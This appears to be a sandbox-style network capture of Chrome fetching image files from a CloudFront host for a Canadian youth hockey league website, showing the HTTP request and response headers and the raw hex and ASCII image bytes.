                                                                                                                          2025-01-13 21:01:21 UTC8877INData Raw: 18 9f 97 79 c9 c7 54 0a 94 90 41 03 3c 8b 68 d9 16 4a 56 64 22 a2 d6 62 e4 e7 26 8a bb 95 15 06 55 a4 9b 9d 47 6c 4d 66 41 9a a5 4a 45 07 39 04 a5 41 82 45 b6 1b 40 02 6a 23 65 b9 97 09 ce b9 45 ee a3 73 ae 23 07 72 53 31 37 28 27 ea cb 65 6f ad 00 24 29 22 e6 d7 1b 85 e2 44 53 1d 25 a5 cc ac af 14 a7 54 e9 17 e5 2b 5c 31 09 28 e4 fb 88 c9 b9 07 8b 30 80 4f 4b 91 53 ad 25 e4 cd b8 0e 77 2d 3a 49 d0 75 13 78 48 6c 5d 53 ed 18 f9 f4 79 e2 42 0b ab 02 5c 95 4a 4d 8a dc cd be eb c4 64 af 90 e2 ec 28 94 94 ec 50 be 5e 71 51 be ab 43 4a c0 dd c4 b4 45 87 04 e2 c5 ec a9 95 91 7e a8 04 21 7e 55 6b 5b ae 17 5c bd cd 8e 71 d1 14 ca 76 64 d2 c8 70 79 45 74 3c e5 9b a8 b2 09 27 7d a2 e2 01 b3 9f 71 27 a5 3e 71 0a 5a 0d 05 b2 7f ac 35 d7 e6 8a a9 eb 61 b3 49 8f bf d2
                                                                                                                          Data Ascii: yTA<hJVd"b&UGlMfAJE9AE@j#eEs#rS17('eo$)"DS%T+\1(0OKS%w-:IuxHl]SyB\JMd(P^qQCJE~!~Uk[\qvdpyEt<'}q'>qZ5aI


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          118192.168.11.204994454.239.153.1384431400C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 21:01:20 UTC672OUTGET /app/uploads/gthl/2024/11/06164616/AROUND-THE-G-TITLE-November-2024-730x411.jpg HTTP/1.1
                                                                                                                          Host: d2pr6pnwfmh0za.cloudfront.net
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                          Referer: https://gthlcanada.com/
                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2025-01-13 21:01:21 UTC487INHTTP/1.1 200 OK
                                                                                                                          Content-Type: image/jpeg
                                                                                                                          Content-Length: 85085
                                                                                                                          Connection: close
                                                                                                                          Date: Mon, 13 Jan 2025 21:01:21 GMT
                                                                                                                          Last-Modified: Wed, 06 Nov 2024 21:46:17 GMT
                                                                                                                          ETag: "327091da5210694a7b476201aaae830f"
                                                                                                                          x-amz-server-side-encryption: AES256
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Server: AmazonS3
                                                                                                                          X-Cache: Miss from cloudfront
                                                                                                                          Via: 1.1 2b74e5ee4d30afba8f9df9907896c5f4.cloudfront.net (CloudFront)
                                                                                                                          X-Amz-Cf-Pop: IAD50-C2
                                                                                                                          X-Amz-Cf-Id: J3HB0EVxYP9n7eK7BrnWuN5xbDEQkX3O6Zj5u5TMRcSZsQcfJ7rGsA==
                                                                                                                          2025-01-13 21:01:21 UTC8192INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 02 00 26 00 26 00 00 ff db 00 43 00 03 02 02 02 02 02 03 02 02 02 03 03 03 03 04 06 04 04 04 04 04 08 06 06 05 06 09 08 0a 0a 09 08 09 09 0a 0c 0f 0c 0a 0b 0e 0b 09 09 0d 11 0d 0e 0f 10 10 11 10 0a 0c 12 13 12 10 13 0f 10 10 10 ff db 00 43 01 03 03 03 04 03 04 08 04 04 08 10 0b 09 0b 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 ff c0 00 11 08 01 9b 02 da 03 01 22 00 02 11 01 03 11 01 ff c4 00 1e 00 00 02 02 03 01 01 01 01 00 00 00 00 00 00 00 00 05 06 04 07 02 03 08 01 00 09 0a ff c4 00 5f 10 00 01 03 03 03 02 04 04 02 07 05 05 03 07 00 1b 01 02 03 04 00 05 11 06 12 21 07 31 13 41 51 61 08 14 22 71 32 81 15 23 42
                                                                                                                          Data Ascii: JFIF&&CC"_!1AQa"q2#B
                                                                                                                          2025-01-13 21:01:21 UTC8192INData Raw: 5c 2e d7 1b 8b cf 4d 9e fa b0 ae 49 3f e5 4c 6d 36 4e 6c 7d c7 f4 8b 4b 7d 38 51 88 db 7b ea ca e3 b8 52 cc 74 1e 7b e6 84 1e ae be e2 4a 0b 49 56 47 f0 a4 59 0b 4c 85 95 63 6a 33 8c 9e e6 a3 16 0a 39 0a da 09 3d aa e0 04 f6 62 49 00 f5 1f 9a ea 3b ae 70 ee d4 8f 2c 9a 68 b1 eb 98 13 60 f8 0e be 84 ad 39 c7 3d fd ea 9f 8d 26 2b 27 12 5a ce 3b 1c 66 b3 9a f3 01 41 e8 03 20 8e 42 4f 6f ca ab 6a b4 ab a9 5f 2d fa 8e a2 f3 a7 6d ea 25 b7 79 7e df 78 b7 98 a8 6d 87 a5 3a b0 db 2b 24 65 b2 7f 6b 3e 58 ab 5a c2 cc 3b 3d 92 14 04 4e 12 14 c2 12 85 38 57 b8 a8 e3 93 9a e5 48 12 40 71 2e 29 e7 5b 57 1c a4 f6 a7 0b 4e af ba db 36 b6 5e 53 cd f7 04 9e 15 51 a4 a4 68 97 62 f3 27 51 67 ed 47 71 e2 5d d7 c8 e5 12 3c 74 8c 05 1e e2 a4 d9 ee 41 bc 30 f1 23 1d 89 a0 5a 63
                                                                                                                          Data Ascii: \.MI?Lm6Nl}K}8Q{Rt{JIVGYLcj39=bI;p,h`9=&+'Z;fA BOoj_-m%y~xm:+$ek>XZ;=N8WH@q.)[WN6^SQhb'QgGq]<tA0#Zc
                                                                                                                          2025-01-13 21:01:21 UTC15990INData Raw: 84 1c e3 91 1a 33 f3 2b 2b 6e 98 1a 2b 56 3d 08 46 95 f2 ab 74 29 85 a8 7d 38 f4 cd 5b 10 06 e2 87 52 ac b6 46 47 de bd 95 2e 14 88 e5 72 50 97 5b c7 73 dd 07 d6 a1 b3 3e 3d a6 14 87 dd 7c 16 31 b9 1f 7f 4a 9a af 7a ef f5 7d d6 fe 73 ac a9 6c ab 8e c4 cb 53 4d 8a c4 65 21 f5 05 24 83 84 e7 93 55 14 e5 41 fd 20 ed ed f6 c4 75 6d db b9 1c 2d c1 53 ef 3a 86 4d fe e4 58 68 94 32 8f a9 c3 ea 3c 85 79 62 d2 32 75 75 c4 36 49 4c 54 0c a8 f9 01 e9 f7 ab 8e c5 db 74 ae 95 60 45 44 2e f7 7f 7d 6d 58 a2 29 a4 15 63 76 32 a2 3e f5 b1 de 9f 6a 06 14 1c b8 17 4e ee 79 35 d2 da 63 43 5a ac 70 d0 db 0c 20 1c 72 71 cd 6b be d9 19 90 f2 19 09 c2 7b 0c 0a 92 db 07 a6 30 22 b7 73 98 3f d9 39 2f 34 58 60 28 ab 7f 0a fb 56 68 b4 ea 7b 72 48 65 0a 2a 6f 95 25 5d 88 ab a2 7e 9a
                                                                                                                          Data Ascii: 3++n+V=Ft)}8[RFG.rP[s>=|1Jz}slSMe!$UA um-S:MXh2<yb2uu6ILTt`ED.}mX)cv2>jNy5cCZp rqk{0"s?9/4X`(Vh{rHe*o%]~
                                                                                                                          2025-01-13 21:01:21 UTC2013INData Raw: 19 cc 47 84 1c b7 85 2f 62 a3 34 e2 b7 2b 77 3f 52 cd 6a f8 a5 d4 53 f5 8f 49 fa 51 ac 2f 08 8f fa 4a eb 16 53 d2 16 cb 41 00 a8 a5 ae 00 f2 1e d5 58 fc 4e b2 88 ff 00 10 7a dd 61 3b 4b d3 59 59 3e bf ee cd 0f f2 a7 9e be 28 0f 87 fe 8a 9f fe c0 93 ff 00 85 aa 6c 4c 3b f0 ef ab 2e 9a 07 e1 e7 a9 1a d3 4f a2 30 b9 db e7 46 2c ad f6 82 d3 ce c4 e0 8f 31 85 1a 11 65 f8 db ea bb 37 78 6e 6a 06 2c d2 ed 89 79 3f 36 c3 50 42 16 e3 59 fa 82 55 bb 83 8c e2 b5 f4 a9 60 fc 26 75 58 8f fe 8d 89 ff 00 89 aa e7 a5 af 1c 9a e9 d2 ec f8 97 e9 9d ab 4f 5e 21 75 23 44 84 bb a4 35 8a 3e 72 22 da 1f 43 0f 28 6e 5b 5e d9 e4 81 e5 f5 0f 2a a4 23 c2 43 b7 48 5c 02 0c 96 b2 0f 98 de 2b a2 be 1c f5 65 9b 5e 69 cb 9f c3 96 bc 90 04 0b d2 54 f5 8a 4a f9 31 26 0f a8 25 39 ed 93 f5
                                                                                                                          Data Ascii: G/b4+w?RjSIQ/JSAXNza;KYY>(lL;.O0F,1e7xnj,y?6PBYU`&uXO^!u#D5>r"C(n[^*#CH\+e^iTJ1&%9
                                                                                                                          2025-01-13 21:01:21 UTC16384INData Raw: 90 94 80 00 18 00 76 02 b8 93 fb 29 ba 64 8d 33 d1 0b a7 51 a5 c6 db 37 58 5c d6 1a 5a 93 f5 7c a4 6c b6 80 3d 8b 85 d3 fc 2b b7 2b db 78 75 4d 56 9c 6f 39 26 79 bd 7d a2 db 8e 3a 1c 45 9e a5 f5 0f 4d 74 a3 42 5e ba 87 ab a5 fc bd aa c7 15 52 5f 50 e5 4b c7 09 42 47 9a 94 a2 12 07 a9 15 f8 ef d5 9f 8e 6e b0 f5 c3 53 3b 3e d1 a9 ae 96 4b 5a 9e 5a 60 da ed d3 17 1d 0c a0 1e 37 6c 20 ad 58 ee a3 f9 60 71 5d 7d fd a7 bd 47 52 2d 9a 6b a4 51 5e fd 5c d2 ab c5 c9 b0 7f 12 12 4a 19 49 f6 dd e2 2b fe 51 5f 99 17 6d 0c cc 79 aa b9 40 79 d8 cb e5 49 53 44 8c 53 2e b3 2d b0 18 cd 25 3c 6e c7 26 7e d3 fc 0c eb 2d 61 ad fe 1e 2c f7 3d 71 75 7a e5 73 8d 2e 54 2f 9a 7d 65 6e ba d3 6b fa 37 a8 f2 a2 01 c6 4f a5 74 05 72 5f f6 63 de 63 4f f8 64 8d 69 37 4f 9c 9f 6a bc 4d
                                                                                                                          Data Ascii: v)d3Q7X\Z|l=++xuMVo9&y}:EMtB^R_PKBGnS;>KZZ`7l X`q]}GR-kQ^\JI+Q_my@yISDS.-%<n&~-a,=quzs.T/}enk7Otr_ccOdi7OjM
                                                                                                                          2025-01-13 21:01:21 UTC1024INData Raw: 21 4f 12 93 94 92 39 07 d6 84 6b 19 72 6f 3f 08 3a 2a 75 c6 43 92 e4 5b f5 4c d8 6d 3a ea ca d6 d3 45 b2 af 0f 27 90 3b 71 f6 aa 44 01 a7 db 82 1b 61 fd 37 f5 8f 9f af f0 9e 82 b7 7b 3c 53 ce de ad 51 bd 3a 1c 96 3a 71 86 0d 92 36 fd 31 ff 00 e5 ed 2b eb 06 b0 d4 d7 5d 04 ae 88 d8 ac 68 99 fa 6a f8 cd c5 b5 34 14 64 38 f8 47 86 96 80 1c 14 f3 9a ea ad 17 2e 0d 8f ab 9d 3f e9 1b 33 5a 9b 71 d0 7a 32 e8 c5 ce 43 4a dc 96 e6 3a c9 5a da 4a bc f6 76 fc f1 55 9f c3 46 89 d5 68 e9 8e b0 ea 57 4e 2c 1f a5 b5 a0 90 dd 92 d0 41 40 54 04 2d 01 4f c8 4e f2 06 fd aa 00 1f 2f e3 5a fa 19 a3 f5 87 48 ba fb 65 6f ab 50 1c b1 c8 d4 d0 ae 11 a3 3d 35 f4 2b c5 79 d6 ca 42 94 a0 a3 dd 64 0c 9f 35 0a 9d 20 b2 af 2d 98 1c 31 1c fb 00 0f 03 3f 24 ff 00 be 60 78 e5 9a 4d 69 d5
                                                                                                                          Data Ascii: !O9kro?:*uC[Lm:E';qDa7{<SQ::q61+]hj4d8G.?3Zqz2CJ:ZJvUFhWN,A@T-ON/ZHeoP=5+yBd5 -1?$`xMi
                                                                                                                          2025-01-13 21:01:21 UTC16384INData Raw: cb 9c c6 de 71 d7 08 71 b0 ca fc 37 8b 4e af 70 2d 29 0c b4 f2 4a 02 79 5b ec f3 83 90 5e 27 45 34 6e a0 b4 cb 65 1d 35 62 d5 7e 9f 67 dc a9 b0 9c 52 d3 6e 92 5a 71 d4 20 b0 4a 76 ad 49 91 11 20 05 a8 15 64 12 9c 73 c2 91 7a 89 d4 3f 09 f8 f2 35 ce a0 5a 1f 73 c4 71 0a b9 3c 42 d4 02 40 51 1b b9 38 4a 46 7f c2 3d 2a 16 ad eb 17 51 dc 61 a6 a4 75 03 51 3a a4 10 5a 0a b9 bc 76 61 41 40 8f ab 8c 29 20 fd c0 f4 a3 5c 31 da 04 53 bb a8 c9 31 33 5b de 25 5c 2f 8f c6 7a 5a 5e 44 57 14 d3 65 bc ec 38 38 c8 ae a0 e9 b4 25 ce d2 f6 87 e4 67 6a 62 a0 00 7c f8 ae 3f 53 8b 7d e5 3c ea d4 b7 16 a2 a5 29 47 24 92 72 49 35 da 9d 39 ca 34 85 8d 4b 18 3f 26 df 1f 95 3c 8c 10 04 a2 58 b0 24 c6 f4 21 2c 35 c0 c7 1c 0a f8 38 db 48 2b 5a 86 7c ea 33 f2 90 91 b9 47 81 40 a7 5c
                                                                                                                          Data Ascii: qq7Np-)Jy[^'E4ne5b~gRnZq JvI dsz?5Zsq<B@Q8JF=*QauQ:ZvaA@) \1S13[%\/zZ^DWe88%gjb|?S}<)G$rI594K?&<X$!,58H+Z|3G@\
                                                                                                                          2025-01-13 21:01:21 UTC2754INData Raw: 4a 51 c6 33 5b ac b1 0c eb 93 4d e3 20 ac 67 f8 d4 fb ed b6 3c 49 ee 25 f9 48 4a 09 dd b5 3c aa a7 e9 c7 6d 49 7d 84 36 95 b2 b2 ae 16 bf 3a f0 6b a6 64 d4 84 6f 63 fd 67 aa f3 81 a7 77 c8 94 ef 59 ae af 2b a8 8e 15 8c 37 07 c3 43 63 fc 29 c5 74 15 be 6c 6d 55 a6 d0 94 b8 16 c5 c2 27 87 91 ee 9c 55 27 f1 05 a6 e4 46 bc 35 a8 5a 41 53 12 10 10 e2 80 e0 28 51 4e 80 6b 00 e3 0f e9 59 6f 61 6d 7e ba 36 4f 97 98 15 ef 90 65 0a cf 2c e7 d5 ba 54 57 dd 2b 32 d3 72 97 12 42 d2 9f 97 75 48 c7 b0 34 3d c8 4d 31 9e 54 48 c0 07 1c 13 5d 07 d4 2e 92 dc 35 5d f5 77 9b 34 e8 ac fc c2 13 e3 34 f2 8a 7e a1 dc 8e 3c ea 3e 93 e8 8c 0b 64 df d2 1a b6 53 53 8b 4b de dc 56 49 28 27 c8 ac fa 7b 52 93 76 70 d0 98 8e c4 74 e8 e6 98 66 c5 a1 a2 ce f0 82 25 cf 47 8a bd c3 04 a7 c8
                                                                                                                          Data Ascii: JQ3[M g<I%HJ<mI}6:kdocgwY+7Cc)tlmU'U'F5ZAS(QNkYoam~6Oe,TW+2rBuH4=M1TH].5]w44~<>dSSKVI('{Rvptf%G
                                                                                                                          2025-01-13 21:01:21 UTC14152INData Raw: 74 c3 a5 ed d9 d8 46 a4 d4 6c 8f 9a c6 f6 18 57 fd 98 f5 3e f4 c5 a2 3a 43 67 d2 2a 4c f9 ea 4c eb 80 e7 7a 87 d0 d9 ff 00 08 3f d6 8d dc ee 5e 3b fe 03 27 28 41 c1 23 cc d0 b3 6e 32 3f 09 b1 eb 5d a6 f0 e0 5c f6 4b aa 1d 81 38 a3 0c 04 32 84 46 65 01 0d b6 36 a5 09 ec 05 0a 82 82 9c 28 f7 a2 cd 14 a0 ee 3d eb 80 e7 32 0e 64 d2 f7 82 ca 97 e8 33 4b 73 35 5d c1 fc a0 ac 36 81 e4 9a 2f 29 c2 63 b8 4f ed 02 00 a5 39 8c 24 2b 68 ec 28 ba 91 98 3e 5f 85 2e e2 87 16 9d cb cf 88 55 e7 45 10 ac 27 34 16 0a 0a a7 c8 59 39 c6 12 3d a8 c2 88 03 02 a2 4c d4 e1 cf 63 5a 14 39 ef 5b 89 23 f8 56 95 77 04 9e 6b a4 45 4d 75 11 bb 8a 9a 54 93 91 0d 09 53 59 3f b6 a5 81 9f e1 47 6d d7 96 11 6f 8c 82 e2 41 4b 28 1f 8b fc 22 97 75 5c 8d f7 f8 96 d5 1e 5f 5b 47 1f e1 0a c9 fe
                                                                                                                          Data Ascii: tFlW>:Cg*LLz?^;'(A#n2?]\K82Fe6(=2d3Ks5]6/)cO9$+h(>_.UE'4Y9=LcZ9[#VwkEMuTSY?GmoAK("u\_[G


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          119192.168.11.204994554.239.153.764431400C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 21:01:20 UTC417OUTGET /app/uploads/gthl/2021/07/17001307/GTHLLOGO-WEB-730x365.jpg HTTP/1.1
                                                                                                                          Host: d2pr6pnwfmh0za.cloudfront.net
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2025-01-13 21:01:20 UTC449INHTTP/1.1 200 OK
                                                                                                                          Content-Type: image/jpeg
                                                                                                                          Content-Length: 19915
                                                                                                                          Connection: close
                                                                                                                          Date: Mon, 13 Jan 2025 21:01:21 GMT
                                                                                                                          Last-Modified: Sat, 17 Jul 2021 04:13:10 GMT
                                                                                                                          ETag: "4fa3eb7376bcd47bd40d24b15fdf99f4"
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Server: AmazonS3
                                                                                                                          X-Cache: Miss from cloudfront
                                                                                                                          Via: 1.1 90ad2a23a8617490c9d13e1f260633f8.cloudfront.net (CloudFront)
                                                                                                                          X-Amz-Cf-Pop: IAD50-C2
                                                                                                                          X-Amz-Cf-Id: _1lCVGpBFTIwumuf-fHhM3yNwQZvJw4znHCNSt0lrLPDE_iFIr_0Jg==
                                                                                                                          2025-01-13 21:01:20 UTC6396INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 01 2c 01 2c 00 00 ff e1 07 41 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 24 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 96 87 69 00 04 00 00 00 01 00 00 00 ac 00 00 00 d8 00 00 01 2c 00 00 00 01 00 00 01 2c 00 00 00 01 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 43 43 20 32 30 31 39 20 28 4d 61 63 69 6e 74 6f 73 68 29 00 32 30 32 31 3a 30 37 3a 31 37 20 30 30 3a 31 32 3a 34 38 00 00 00 00 03 a0 01 00 03 00 00 00 01 00 01 00 00 a0 02 00 04 00 00 00 01 00 00 04 00 a0 03 00 04 00 00 00 01 00 00 02 00 00 00 00 00 00 00 00 06 01 03 00 03 00 00 00
                                                                                                                          Data Ascii: JFIF,,AExifMM*bj(1$r2i,,Adobe Photoshop CC 2019 (Macintosh)2021:07:17 00:12:48
                                                                                                                          2025-01-13 21:01:21 UTC2167INData Raw: 32 31 2d 30 37 2d 31 37 54 30 30 3a 31 32 3a 34 38 2d 30 34 3a 30 30 22 20 73 74 45 76 74 3a 73 6f 66 74 77 61 72 65 41 67 65 6e 74 3d 22 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 43 43 20 32 30 31 39 20 28 4d 61 63 69 6e 74 6f 73 68 29 22 20 73 74 45 76 74 3a 63 68 61 6e 67 65 64 3d 22 2f 22 2f 3e 20 3c 2f 72 64 66 3a 53 65 71 3e 20 3c 2f 78 6d 70 4d 4d 3a 48 69 73 74 6f 72 79 3e 20 3c 70 68 6f 74 6f 73 68 6f 70 3a 44 6f 63 75 6d 65 6e 74 41 6e 63 65 73 74 6f 72 73 3e 20 3c 72 64 66 3a 42 61 67 3e 20 3c 72 64 66 3a 6c 69 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 61 35 34 36 66 64 62 31 2d 38 34 30 61 2d 66 33 34 35 2d 61 30 34 37 2d 37 32 39 34 65 38 61 64 37 63 39 64 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e
                                                                                                                          Data Ascii: 21-07-17T00:12:48-04:00" stEvt:softwareAgent="Adobe Photoshop CC 2019 (Macintosh)" stEvt:changed="/"/> </rdf:Seq> </xmpMM:History> <photoshop:DocumentAncestors> <rdf:Bag> <rdf:li>adobe:docid:photoshop:a546fdb1-840a-f345-a047-7294e8ad7c9d</rdf:li> <rdf:li>
                                                                                                                          2025-01-13 21:01:21 UTC11352INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                          Data Ascii:


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          120192.168.11.204994654.239.153.1384431400C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 21:01:20 UTC692OUTGET /app/uploads/gthl/2023/03/14100611/Screen-Shot-2023-03-14-at-10.05.42-AM-e1678802821516-730x432.png HTTP/1.1
                                                                                                                          Host: d2pr6pnwfmh0za.cloudfront.net
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                          Referer: https://gthlcanada.com/
                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2025-01-13 21:01:21 UTC487INHTTP/1.1 200 OK
                                                                                                                          Content-Type: image/png
                                                                                                                          Content-Length: 574526
                                                                                                                          Connection: close
                                                                                                                          Date: Mon, 13 Jan 2025 21:01:21 GMT
                                                                                                                          Last-Modified: Tue, 14 Mar 2023 14:07:08 GMT
                                                                                                                          ETag: "16d1720f2d45a79a5c22e39358deb46c"
                                                                                                                          x-amz-server-side-encryption: AES256
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Server: AmazonS3
                                                                                                                          X-Cache: Miss from cloudfront
                                                                                                                          Via: 1.1 dc81af6f14945ade0fd126a735f82ac2.cloudfront.net (CloudFront)
                                                                                                                          X-Amz-Cf-Pop: IAD50-C2
                                                                                                                          X-Amz-Cf-Id: bQdnt6dxhojB_oasyjXVBlRrqUYYFl7KEpKvi0HodPwijRipXbTlxw==
                                                                                                                          2025-01-13 21:01:21 UTC15897INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 da 00 00 01 b0 08 06 00 00 00 97 69 c2 92 00 00 80 00 49 44 41 54 78 da ac fd 49 b7 25 c9 96 1e 86 7d db cc dc 4f 77 db e8 23 b2 7b 4d 35 af 44 14 0a 03 91 03 75 00 06 5a 4b 24 c8 81 26 9c 6b 71 c0 a5 ff a4 89 f4 17 a8 19 a1 91 b4 c0 45 52 04 21 56 01 d5 bd 26 fb cc c8 26 6e dc fe 9c e3 6e b6 35 b0 6d 66 db cc fd dc 88 7c ef 25 90 95 2f 23 ef 3d 8d bb b9 d9 de df fe 1a fa cd b7 57 0c 10 00 80 08 00 31 de e7 2f fd 63 44 04 02 c5 df 97 d7 02 28 fd 7f 30 02 98 19 00 83 19 f1 6f 02 c0 84 10 02 40 04 d7 75 b8 bb bb c3 ff fb bf fb ef f1 e9 97 5f e1 a3 8f 3e c4 8b 97 cf c1 c4 18 86 1d 76 c3 1e c3 38 02 20 90 b5 e0 90 de dd 80 43 c0 b8 df 01 c1 c3 39 87 d5 aa c7 2f 7f f9 0b 6c 8e 8f 30 fa 31 ff dc c5 9b 2b
                                                                                                                          Data Ascii: PNGIHDRiIDATxI%}Ow#{M5DuZK$&kqER!V&&nn5mf|%/#=W1/cD(0o@u_>v8 C9/l01+
                                                                                                                          2025-01-13 21:01:21 UTC93INData Raw: 7c 7b 89 a3 a3 63 58 eb 60 8c d8 b6 31 37 bd 07 55 89 58 d4 d2 43 40 35 0d 59 52 18 d3 38 2f 20 0a 36 96 ab 25 86 fd 1e c3 7e 0f bb 5e 15 64 27 be 71 14 75 18 23 eb 4a 8d b7 ab b4 be 38 11 89 41 09 f1 9f c6 1a 11 d5 aa 61 1b d5 d7 cf 28 77 73 6a 8b 91 2c 90 53 9a 0b b1 71 4a d6
                                                                                                                          Data Ascii: |{cX`17UXC@5YR8/ 6%~^d'qu#J8Aa(wsj,SqJ
                                                                                                                          2025-01-13 21:01:21 UTC1001INData Raw: 57 24 54 2b 9d dc 56 1c 34 80 71 f4 c2 c5 67 f4 7d 1f 0b 0c 3f 96 40 52 e6 5a 13 c2 35 ff 57 bf 6e c5 a9 55 e2 49 56 fc d0 e4 d3 0b 71 28 28 93 b4 03 e3 3f 95 5a 79 70 cc d8 1c 15 da e6 74 62 7a ad a7 7c d4 d0 ac 66 dc 20 18 dc 44 80 a3 9d 21 d5 9c e4 26 a4 85 43 a1 ea 4c af 1f a6 5d 04 a3 b2 f2 6b 63 c1 49 09 91 21 a2 2b 3a c8 72 6c f8 9b 9a ca 38 29 52 95 c2 5f 77 28 59 f4 a6 be 42 13 7e d3 22 5a b3 e8 79 6b d8 30 13 4d d3 5e eb 3a f0 86 aa 64 c8 e9 34 a5 2e 72 b9 1d 79 57 82 28 2e 5c 69 85 8d 75 32 69 25 10 76 bb 5d 5e f3 65 5a a5 1a f7 aa 34 79 8f bd 4e 47 93 93 49 d5 76 d1 31 b5 af 94 c4 5e ba 09 41 3d 01 d0 56 82 ac 0b 70 1d 79 4f 34 45 0e 9b df 85 b2 df 34 ca 30 4e b3 df 58 15 ec d4 5a 35 56 85 13 95 aa 9b 8b 45 65 55 59 4c fa 62 52 54 1f ed 48 03
                                                                                                                          Data Ascii: W$T+V4qg}?@RZ5WnUIVq((?Zyptbz|f D!&CL]kcI!+:rl8)R_w(YB~"Zyk0M^:d4.ryW(.\iu2i%v]^eZ4yNGIv1^A=VpyO4E40NXZ5VEeUYLbRTH
